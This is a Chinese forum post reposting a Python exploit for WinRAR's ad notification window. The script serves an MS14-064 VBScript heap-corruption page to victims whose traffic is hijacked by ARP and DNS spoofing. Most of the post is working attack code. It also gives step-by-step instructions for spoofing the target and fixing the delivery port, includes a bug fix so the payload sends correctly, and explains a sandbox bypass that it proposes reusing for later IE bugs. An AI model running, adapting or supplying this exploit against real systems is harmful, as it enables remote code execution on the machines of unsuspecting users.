继SFX漏洞之后又一枚“漏洞”

    发表于 2015-10-17 22:03:38 | 显示全部楼层 |阅读模式
    exp:
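        #!/usr/bin/python -w
        # Title : WinRar Expired Notification - OLE Remote Command Execution
        # Date : 30/09/2015
        # Author : R-73eN
        # Tested on : Windows Xp SP3 with WinRAR 5.21
        # This exploits a vulnerability in the implementation of showing ads.
        # When a user opens any WINRAR file sometimes
        # A window with Expired Notification title loads http://www.win-rar.com/notifier/
        # reminding user to buy winrar to remove ads.
        # Since this uses a http connection we can use Man In The Middle attack
        # to gain Remote Code Execution
        #
        # Triggering the vulnerability
        # 1) Run this python script.
        # 2) arpspoof the target
        # 3) dnsspoof www.win-rar.com to point to your IP
        # 4) Wait for the victim to open WinRar files.
        #
        # Video :  https://youtu.be/h976wFlHGw4
        #
        # i hope this time the "great security researcher" Mohammad Reza Espargham
        # me[at]reza[dot]es , reza.espargham[at]gmail[dot]com doesnt steals again my exploit .....
        #
        # http://0day.today/exploit/description/24292 My exploit publishied in 25/09/2015
        # http://0day.today/exploit/description/24296 same exploit written in perl publishied in 26/09/2015
        #
        # ---------------------------------------------------------------------------
        # Reviewer notes (what this script actually relies on, read from the code):
        #
        # * The served page is NOT a WinRAR bug by itself. It is an HTML page carrying a
        #   VBScript heap-corruption exploit (the `redim Preserve` / `Over()` / `rum()`
        #   pattern below); the forum post identifies it as MS14-064. A target that has
        #   the MS14-064 fix installed only receives a harmless page.
        # * The VBScript bails out early (see `Begin()`) unless the User-Agent contains
        #   "MSIE" and does NOT contain "Win64", so it only fires when the notifier
        #   window is rendered by a 32-bit IE/MSHTML engine. The `intVersion<4`
        #   branch calls `runshellcode()`, which is never defined; that branch is dead.
        # * Payload is `Shell.Application.ShellExecute "calc.exe", "runas", 0`
        #   (see `runmumaa()`); replace it only for authorised testing.
        # * Port mismatch: http://www.win-rar.com/notifier/ is fetched on TCP 80, but
        #   this script listens on 8080 by default. Either pass 80 as argv[1] (needs
        #   privileges) or redirect 80 -> 8080 on the attacker box; DNS spoofing alone
        #   will not reach an 8080 listener.
        # * Bug fixed here: the original built a full HTTP response (`response`) and
        #   then sent the bare HTML instead (`connection.send(exploit)`). We now send
        #   the HTTP response, use sendall(), and close both sockets.
        # * Plain HTTP, one-shot: answers the first TCP client and exits, like the
        #   original. Python 2 and 3 are both accepted.
        # ---------------------------------------------------------------------------
          
        banner = ""
        banner +="  ___        __        ____                 _    _  \n"
        banner +=" |_ _|_ __  / _| ___  / ___| ___ _ __      / \  | |    \n"
        banner +="  | || '_ \| |_ / _ \| |  _ / _ \ '_ \    / _ \ | |    \n"
        banner +="  | || | | |  _| (_) | |_| |  __/ | | |  / ___ \| |___ \n"
        banner +=" |___|_| |_|_|  \___/ \____|\___|_| |_| /_/   \_\_____|\n\n"

        import socket
        import sys

        try:                      # Python 2
            _read_line = raw_input
        except NameError:         # Python 3
            _read_line = input

        CRLF = "\r\n"
        DEFAULT_PORT = 8080       # original hard-coded value; see port note above

        # OLE command execution (MS14-064 VBScript exploit page, served verbatim)
        exploit = """<html>
        <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >
        <head>
        </head>
        <body>
           
        <SCRIPT LANGUAGE="VBScript">
          
        function runmumaa()
        On Error Resume Next
        set shell=createobject("Shell.Application")
        shell.ShellExecute "calc.exe", "runas", 0
        end function
        </script>
           
        <SCRIPT LANGUAGE="VBScript">
           
        dim   aa()
        dim   ab()
        dim   a0
        dim   a1
        dim   a2
        dim   a3
        dim   win9x
        dim   intVersion
        dim   rnda
        dim   funclass
        dim   myarray
           
        Begin()
           
        function Begin()
          On Error Resume Next
          info=Navigator.UserAgent
           
          if(instr(info,"Win64")>0)   then
             exit   function
          end if
           
          if (instr(info,"MSIE")>0)   then
                     intVersion = CInt(Mid(info, InStr(info, "MSIE") + 5, 2))   
          else
             exit   function  
                       
          end if
           
          win9x=0
           
          BeginInit()
          If Create()=True Then
             myarray=        chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00)
             myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0)
           
             if(intVersion<4) then
                 document.write("<br> IE")
                 document.write(intVersion)
                 runshellcode()                    
             else  
                  setnotsafemode()
             end if
          end if
        end function
           
        function BeginInit()
           Randomize()
           redim aa(5)
           redim ab(5)
           a0=13+17*rnd(6)
           a3=7+3*rnd(5)
        end function
           
        function Create()
          On Error Resume Next
          dim i
          Create=False
          For i = 0 To 400
            If Over()=True Then
               Create=True
               Exit For
            End If
          Next
        end function
           
        sub testaa()
        end sub
           
        function mydata()
            On Error Resume Next
             i=testaa
             i=null
             redim  Preserve aa(a2)  
             
             ab(0)=0
             aa(a1)=i
             ab(0)=6.36598737437801E-314
           
             aa(a1+2)=myarray
             ab(2)=1.74088534731324E-310  
             mydata=aa(a1)
             redim  Preserve aa(a0)  
        end function
           
           
        function setnotsafemode()
            On Error Resume Next
            i=mydata()  
            i=rum(i+8)
            i=rum(i+16)
            j=rum(i+&h134)  
            for k=0 to &h60 step 4
                j=rum(i+&h120+k)
                if(j=14) then
                      j=0         
                      redim  Preserve aa(a2)            
             aa(a1+2)(i+&h11c+k)=ab(4)
                      redim  Preserve aa(a0)  
           
             j=0
                      j=rum(i+&h120+k)   
                    
                       Exit for
                   end if
           
            next
            ab(2)=1.69759663316747E-313
            runmumaa()
        end function
           
        function Over()
            On Error Resume Next
            dim type1,type2,type3
            Over=False
            a0=a0+a3
            a1=a0+2
            a2=a0+&h8000000
             
            redim  Preserve aa(a0)
            redim   ab(a0)     
             
            redim  Preserve aa(a2)
             
            type1=1
            ab(0)=1.123456789012345678901234567890
            aa(a0)=10
                    
            If(IsObject(aa(a1-1)) = False) Then
               if(intVersion<4) then
                   mem=cint(a0+1)*16            
                   j=vartype(aa(a1-1))
                   if((j=mem+4) or (j*8=mem+8)) then
                      if(vartype(aa(a1-1))<>0)  Then   
                         If(IsObject(aa(a1)) = False ) Then            
                           type1=VarType(aa(a1))
                         end if               
                      end if
                   else
                     redim  Preserve aa(a0)
                     exit  function
           
                   end if
                else
                   if(vartype(aa(a1-1))<>0)  Then   
                      If(IsObject(aa(a1)) = False ) Then
                          type1=VarType(aa(a1))
                      end if               
                    end if
                end if
            end if
                         
              
            If(type1=&h2f66) Then         
                  Over=True      
            End If  
            If(type1=&hB9AD) Then
                  Over=True
                  win9x=1
            End If  
           
            redim  Preserve aa(a0)         
                   
        end function
           
        function rum(add)
            On Error Resume Next
            redim  Preserve aa(a2)  
             
            ab(0)=0   
            aa(a1)=add+4     
            ab(0)=1.69759663316747E-313      
            rum=lenb(aa(a1))  
              
            ab(0)=0
            redim  Preserve aa(a0)
        end function
           
        </script>
           
        </body>
        </html>"""


        def build_response(body):
            """Wrap `body` in a minimal HTTP/1.1 200 response.

            Same header set as the original script (Content-Type, Connection: close,
            fake Server banner, Content-Length). `body` is ASCII, so len() in
            characters equals the byte count advertised in Content-Length.
            Returns the response as a str (not yet encoded).
            """
            headers = [
                "HTTP/1.1 200 OK",
                "Content-Type: text/html",
                "Connection: close",
                "Server: Apache",
                "Content-Length: " + str(len(body)),
            ]
            return CRLF.join(headers) + CRLF + CRLF + body


        def serve_once(host, port, body):
            """Bind host:port, answer the first TCP client with `body` as an HTTP page, return.

            One-shot by design (matches the original's behaviour of exiting after the
            first request). Both sockets are always closed; bind/accept errors propagate
            to the caller so a wrong IP or a port in use is visible instead of silent.
            """
            listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            # Allow quick restarts while the previous one-shot socket is in TIME_WAIT.
            listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
            try:
                listener.bind((host, port))
                listener.listen(1)
                print("\n[+] Server started " + host + ":" + str(port) + " [+]")
                print("\n[+] Waiting for request . . . [+]")
                print("\n[+] Arpspoof target , and make win-rar.com to point to your IP [+]")
                connection, client_address = listener.accept()
                try:
                    # Read (and discard) the request; only its arrival matters here.
                    connection.recv(2048)
                    print("[+] Got request from " + client_address[0] + " , sending exploit . . .[+]")
                    # sendall() instead of send(): send() may write only part of the page.
                    connection.sendall(build_response(body).encode("latin-1"))
                    print("[+] Exploit sent , A calc should pop up . .  [+]")
                finally:
                    connection.close()
            finally:
                listener.close()


        def main():
            """Print the banner, ask for the local IP, serve the page once and exit(0).

            Optional argv[1] overrides the listening port (default 8080). The notifier
            URL has no explicit port, so the victim connects to 80 — see header notes.
            """
            print(banner)
            print(" [+] WinRar (Free Version) - Remote Command Execution [+]\n")
            host = _read_line(" Enter Local IP: ")
            port = int(sys.argv[1]) if len(sys.argv) > 1 else DEFAULT_PORT
            serve_once(host, port, exploit)
            print("\nhttps://www.infogen.al/\n")
            sys.exit(0)


        if __name__ == "__main__":
            main()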
    
                #  0day.today [2015-10-15]  #


    保存为python脚本并运行
    arpspoof目标主机
    再dns欺骗目标主机，把 www.win-rar.com 指向自己
    注意：脚本默认监听 8080 端口，而通知页 URL http://www.win-rar.com/notifier/ 走的是 80 端口，需要在本机把 80 端口重定向到 8080，或者直接改成监听 80
    目标主机打开winrar、弹出“Expired Notification”窗口时即可触发
    ↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓继续↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓
    可能有些朋友注意到了，脚本返回的页面本身就是 2014 年的一个 IE 漏洞：ms14-064（页面里的 VBScript 堆破坏代码，最后调用 Shell.Application 执行 calc.exe）
    所以触发条件实际上有三个：
    1:在局域网可劫持环境（arp + dns 欺骗）
    2:目标没打ms14-064补丁（作者测试环境是 Windows XP SP3 + WinRAR 5.21）
    3:渲染通知页的是 32 位 IE 引擎——VBScript 开头检查 UserAgent，含 "Win64" 或不含 "MSIE" 时直接退出
    -------------------------------------------------------------------------
    当然，为什么要通过 WinRAR 的通知窗口来打。其实涉及到浏览器的沙箱机制：直接在 IE 里打开同样的页面会受到 IE 自身的保护模式/沙箱限制，而这个通知页是在 WinRAR 进程里用内嵌的 IE 控件渲染的（推测，标题里的 OLE 指的就是这一点），恰恰绕过了这层限制，导致打开压缩包就直接触发。
    当然了，以后出现类似的 IE 漏洞，同样可以借这个通知页来绕过沙箱。

    原帖地址:http://www.sadboy.org/forum.php?mod=viewthread&tid=418&extra=